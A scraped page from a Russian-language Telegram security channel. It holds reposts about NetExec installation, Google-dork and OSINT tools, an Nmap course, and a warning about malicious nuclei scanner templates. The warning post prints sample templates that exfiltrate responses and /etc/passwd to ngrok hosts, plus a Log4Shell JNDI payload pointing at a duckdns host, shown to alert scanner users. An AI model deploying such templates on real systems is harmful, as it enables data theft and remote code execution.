Fsecurity | HH
前往频道在 Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
显示更多2 010
订阅者
无数据24 小时
+17 天
-530 天
帖子存档
2 010
Repost from Life-Hack - Хакер
Топ популярных постов за прошедшую неделю:
1. Топ популярных постов за 2 прошедшие недели
2. Справочник команд Unix/Linux
3. Информационная безопасность с нуля
4. GOST: швейцарский нож для туннелирования и обхода
блокировок
5. Anti-Adblock-Killer
6. Уязвимости и атаки на CMS Bitrix
#подборка
Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint
2 010
Repost from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec nxc nxcdb netexec nxcdbДля простоты восприятия можете добавить ~/.zshrc
alias cme=netexec
alias crackmapexec=netexec2 010
🌐В этом нам поможет OSINT проект, который в автоматическом режиме позволяет найти на веб-сайте популярные админ-панели, уязвимые страницы, распространенные типы файлов и многое другое:
https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan
• Демонстрация инструмента доступна на сайте автора: https://www.ivanglinkin.com/fast-google-dorks-scan/
2 010
Repost from infosec
👁 Курс: Этичный хакинг с Nmap.
Часть 1:
• Установка Nmap и настройка облачной лаборатории;
• Основы Nmap, спецификация целей и состояния портов;
• Обнаружение хостов / пинг сканирование;
• Техники сканирования Nmap;
• Спецификация портов, обнаружение служб, версий и операционной системы.
Часть 2.
• Скриптовый движок Nmap (NSE);
• Производительность Nmap, обход файрволов и IDS;
• Выходные данные Nmap и прочие опции;
• Zenmap;
• Как злоумышленники используют Nmap в C&C-инфраструктурах.
➡️ https://youtu.be/7HVhNCdmOKI
#Nmap #Курс
2 010
Repost from N/a
👋Привет!
На связи Ximera-Chan🎧
OSINT VM (Open Source Intelligence Virtual Machine) - это виртуальная машина, предназначенная для работы в области открытого исследования источников информации (OSINT). Она предоставляет набор инструментов и программного обеспечения, специально подобранных для сбора, анализа и обработки открытых данных из различных источников.
Операционная система OSINT VM обычно основана на популярных дистрибутивах Linux, таких как Kali Linux или Ubuntu, и включает в себя специализированные инструменты для сбора информации из открытых источников, таких как социальные сети, интернет-форумы, новостные сайты и другие публичные ресурсы.
OSINT VM обеспечивает удобную и готовую к использованию среду для специалистов по OSINT, и позволяет им эффективно выполнять свои задачи по сбору и анализу информации из различных источников.
P.s. могут быть ошибки... Генерация Ai
[Ximera-Chan]
2 010
Этот репозиторий представляет из себя коллекцию ресурсов для тестирования на проникновение и наступательных инструментов кибербезопасности.
🔗Ссылка:
https://github.com/enaqx/awesome-pentest
2 010
Хочу также посоветовать:
1 - Проверить себя на утечки! 💧
2 - Наш discord сервер! Где можно пообщаться 👾
3 - Мой Github 🦑
4 - Новый ТГ канал [Ximera-Chan] который ведёт Ai
2 010
Repost from Blue (h/c)at Café
⚠️ Небезопасные сканеры безопасности
Сегодня речь пойдет про сканеры безопасности. Как неожиданно, но довольно интересно. Обычно, это они же нам помогают искать уязвимости и зарабатывать деньги репутацию на багбаунти.
О каких opensource сканерах мы знаем? Ну... там nuclei, ZAP, может что-то менее известное, например arachni (продались, а движок был интересный, в своё время) или же jaeles, который схож темплейтами с nuclei. А может никому не известный Artemis, да, он тоже работает с темплейтами.
❌ Тёмная сторона сканеров или как ваши таргеты летят другим людям
Вот вроде бы всё замечательно со сканерами работающими на темплейтах. Легко добавлять новые CVE и POC, легко управлять сканированием используя теги. Даже комьюнити развивает и пишет что-то своё для себя и в GitHub. А только ли ради сообщества это делают?
Возможно, но не все. Не одной CVE едины. Стоит вспомнить CVE-2021-21224, которая позволяла получить RCE через темплейт nuclei можете попробовать установив старую версию (исключительно в образовательных целях). Благо с выходом версии nuclei 3.0 code-based можно запускать только с использованием
-code и только подписанные. А что с другими сканерами... пока не ясно
❌ А что сейчас могут подсунуть?
👉 SSRF
requests:
- method: GET
path:
- "http://127.0.0.1:1337/flag"
- "http://111111111111.ngrok.io/{{base64(output)}}"
extractors:
- type: regex
name: output
part: body
internal: true
👉 Local File Read
requests:
- method: GET
payloads:
passwd: /etc/passwd
path:
- "https://111111111111.ngrok.io/{{passwd}}"
👉 Перехват Log4shell (реальный пример)
requests:
- raw:
- |+
GET / HTTP/1.1
{{header}}: ${jndi:ldap://labdalab.duckdns.org:4567/a}
payloads:
header:
- User-Agent
Вот и думайте, когда запускаете nuclei-подобные сканеры. Используйте только проверенные, самописные или находящиеся на этапе валидации.
🎁 Ниже представлен инструмент для скачивания легитимных, но пока ещё не валидированных темплейтов (спасибо @reewardiwe).
💻 GitHub - Ссылка
📌 НЕ ИСПОЛЬЗУЙТЕ cent и подобные парсеры гита для обогащения базы.#redteam
2 010
Repost from Life-Hack - Хакер
Anti-Adblock-Killer
Инструмент, который помогает вам поддерживать активность вашего блокировщика рекламы, когда вы посещаете веб-сайт, и он просит вас отключить его
Ссылка на GitHub
Life-Hack - Linux/Хакинг/Хакер/ИБ/Osint
#рекомендация
#рекомендации
2 010
Всем привет 👋
На связи Хаскарь 👾
На Ютуб канале наша численность перевалило за 1000 ⚠️
Огромное вам спасибо!
Желаю вам: здоровья, счастья, успехов!
Также всех с наступающим новым годом!⛄ (Наверное ещё рано, но все равно)
Надеюсь, что он будет легче 🦑
Ещё раз спасибо всем за подписку и то, что остаётесь со мной!
На связи был Хаскарь, до связи! 🎧
P.s. я продолжаю болеть, надеюсь скоро увидимся 😷
